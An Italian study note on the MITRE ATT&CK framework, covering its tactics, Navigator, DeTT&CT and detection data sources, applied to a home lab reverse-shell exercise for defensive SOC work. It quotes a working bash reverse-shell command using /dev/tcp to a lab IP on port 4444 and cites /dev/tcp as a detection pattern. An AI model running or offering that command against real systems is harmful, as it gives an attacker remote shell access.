Cosa fa#
Fornisce un linguaggio comune e una matrice strutturata per descrivere le azioni degli attaccanti. Invece di concentrarsi su indicatori statici (IP, hash), si concentra sui comportamenti (TTP) — molto piu' difficili da cambiare per un attaccante.
Acronimo: ATT&CK — Adversarial Tactics, Techniques, and Common Knowledge.
Struttura del framework#
Gerarchia#
Tattica (perche')
└── Tecnica (come) → T1059 Command and Scripting Interpreter
└── Sub-tecnica (variante specifica) → T1059.004 Unix ShellTattiche — le 14 fasi della kill chain#
| # | Tattica | Domanda | Esempio |
|---|---|---|---|
| 1 | Reconnaissance | Cosa sa di me prima di attaccare? | Scanning, OSINT |
| 2 | Resource Development | Cosa prepara prima di attaccare? | Dominio C2, server staging |
| 3 | Initial Access | Come entra nella rete? | Phishing, exploit app web |
| 4 | Execution | Come esegue codice sul sistema? | T1059 bash, PowerShell |
| 5 | Persistence | Come rimane anche dopo reboot? | Cron job, servizio di sistema |
| 6 | Privilege Escalation | Come ottiene piu' permessi? | Sudo exploit, SUID abuse |
| 7 | Defense Evasion | Come evita il rilevamento? | Disabilita log, offuscamento |
| 8 | Credential Access | Come ruba credenziali? | /etc/shadow, keylogger |
| 9 | Discovery | Cosa c'e' nell'ambiente? | whoami, net user, ip a |
| 10 | Lateral Movement | Come si sposta ad altri host? | SSH con chiavi rubate |
| 11 | Collection | Cosa raccoglie per esfiltrazione? | Archivi, database, mail |
| 12 | Command and Control | Come comunica col suo server? | Reverse shell su porta 4444 |
| 13 | Exfiltration | Come porta fuori i dati? | Upload su server esterno |
| 14 | Impact | Qual e' il danno finale? | Ransomware, cancellazione dati |
Tecniche e sub-tecniche#
Le sub-tecniche sono varianti della stessa tecnica — non si usano tutte insieme. Se l'attaccante ha usato una reverse shell bash: T1059.004 (Unix Shell), non T1059.001 (PowerShell). Mappi la sub-tecnica che corrisponde a quello che hai osservato.
Come usare attack.mitre.org#
Flusso operativo SOC#
1. Osservi comportamento anomalo
↓
2. Vai su attack.mitre.org → cerchi la tecnica
↓
3. Leggi la sezione "Detection"
→ ti dice cosa cercare nei log
↓
4. Controlli se hai quei Data Sources
→ se si: configuri la regola SIEM
→ se no: hai un gap di visibilita'La sezione Detection#
Ogni tecnica ha una sezione Detection che descrive:
- Comportamenti da monitorare (es: shell con /dev/tcp negli argomenti)
- Data Sources — i tipi di log necessari per rilevare quella tecnica
Esempio T1059.004 — Unix Shell (il nostro lab):
Monitora l'esecuzione di bash/sh/zsh con argomenti anomali. Cerca processi shell che aprono connessioni di rete, specialmente con
/dev/tcpnei parametri.
Data Sources richiesti:
- Command Execution → auditd syscall execve, EDR
- Process Creation → auditd, Sysmon (Linux), EDR
Nel nostro lab: il comando bash -i >& /dev/tcp/192.168.64.200/4444 0>&1 sarebbe stato visibile in auditd se configurato. Senza auditd abbiamo dovuto fare live forensics con ss -tp e ps aux.
Cercare per industria/settore#
attack.mitre.org → sezione Groups: puoi cercare per settore ("healthcare", "finance") per trovare i gruppi APT che attaccano la tua industria e le tecniche che usano.
Navigator#
URL: https://mitre-attack.github.io/attack-navigator/
Strumento di visualizzazione della matrice ATT&CK. Usi:
- Colorare le tecniche che hai osservato in un incidente (mappa della kill chain)
- Mostrare la copertura difensiva (verde = rilevo, rosso = cieco)
- DeTT&CT puo' esportare la copertura direttamente nel Navigator
Non e' per consultazione quotidiana — e' per analisi e reporting.
DeTT&CT#
URL: https://rabobank-cdc.github.io/dettect-editor/#/home
Risponde alla domanda: ho i log giusti per rilevare questa tecnica?
Funziona con file YAML che descrivono i tuoi data sources. Per ogni tecnica ATT&CK calcola un punteggio di visibilita':
- Verde — hai i log per rilevarla
- Rosso — sei cieco
Esempio con il nostro Ubuntu server:
# data sources disponibili
- auditd: non configurato per execve
- syslog: si
- auth.log: siRisultato: T1059.004 = rosso — manca auditd. Spiega perche' nel lab non abbiamo ricevuto alert automatici.
Top tecniche piu' osservate (CTID)#
Fonte: https://ctid.mitre.org/projects/top-attack-techniques/
| ID | Tecnica | Note |
|---|---|---|
| T1059 | Command and Scripting Interpreter | Cross-platform — il nostro lab |
| T1047 | Windows Management Instrumentation | Windows |
| T1053 | Scheduled Task/Job | Persistence comune |
| T1574 | Hijack Execution Flow | DLL hijacking, prevalentemente Windows |
| T1543 | Create or Modify System Process | Persistence |
| T1562 | Impair Defenses | Attaccante disabilita log/AV |
| T1055 | Process Injection | Evasion avanzata |
| T1036 | Masquerading | Evasion — processo che si camuffa |
| T1021 | Remote Services | Lateral movement (SSH, RDP) |
| T1003 | OS Credential Dumping | Mimikatz, /etc/shadow |
La maggior parte e' Windows-heavy. Per ambienti Linux: T1059, T1021, T1562, T1053 sono le priorita'.
I data source piu' importanti (DeTT&CT stats)#
| Count tecniche coperte | Data Source | Esempi concreti |
|---|---|---|
| 255 | Command Execution | auditd execve, Sysmon, EDR |
| 206 | Process Creation | auditd, Sysmon, EDR |
| 98 | File Modification | auditd, file integrity (tripwire) |
| 82 | Network Traffic Flow | NetFlow, firewall, Zeek |
| 58 | Network Connection Creation | NetFlow, firewall |
Configurare auditd per Command Execution e Process Creation copre la maggioranza delle tecniche rilevabili con i log.
Pyramid of Pain#
ATT&CK opera al livello piu' alto della Pyramid of Pain: i TTP.
TTP (comportamenti) ← ATT&CK — difficilissimi da cambiare
Tools (strumenti usati)
Network/Host Artifacts
Domain Names
IP Addresses
Hash Values ← facili da cambiare per l'attaccanteRilevare un comportamento obbliga l'attaccante a riprogettare il suo approccio — molto piu' costoso che cambiare un IP o un hash.
Scenario Reale#
Lab reverse shell (Ubuntu → Kali):
- Osservato: processo
bashcon/dev/tcp/192.168.64.200/4444attivo, TTY?, connessione ESTABLISHED inss -tp - Mappatura ATT&CK:
- Tattica: Command and Control (T1071) + Execution (T1059)
- Tecnica: T1059.004 — Unix Shell
- Detection section dice: monitora bash con argomenti /dev/tcp
- Data source richiesto: Command Execution (auditd execve)
- Gap identificato: auditd non configurato → lab giovedi' chiude questo gap con regola Wazuh
Collegato a#
- incident-response-lifecycle — ATT&CK usato in ogni fase PICERL per classificare le tecniche
- glossario-cyber — TTP, IOC, IOA definiti
- soc-tiers — Tier 2/3 usano ATT&CK per threat hunting e detection engineering
- wazuh-architecture — SIEM dove converge la detection
